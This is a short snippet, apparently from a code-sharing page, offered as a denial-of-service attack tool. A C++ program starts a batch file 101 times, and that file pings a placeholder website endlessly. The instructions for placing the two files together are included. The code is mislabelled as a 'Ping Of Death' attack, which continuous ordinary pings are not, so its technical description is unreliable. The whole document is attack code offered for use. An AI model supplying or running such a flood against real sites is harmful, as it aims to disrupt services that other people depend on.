ddos using C++
/*
Program to perform Ping Of Death (POD) attack using C++
*/
#include <bits/stdc++.h>
using namespace std;
int main (void) {
int i, j;
for (i = 0; i <= 100; i++) {
system("start ddos.bat");
}
return 0;
}
Make a file called ddos.bat and place both .cpp and .bat file in same folder
@echo off
color 0a
ping www.yourwebsitehere.com -t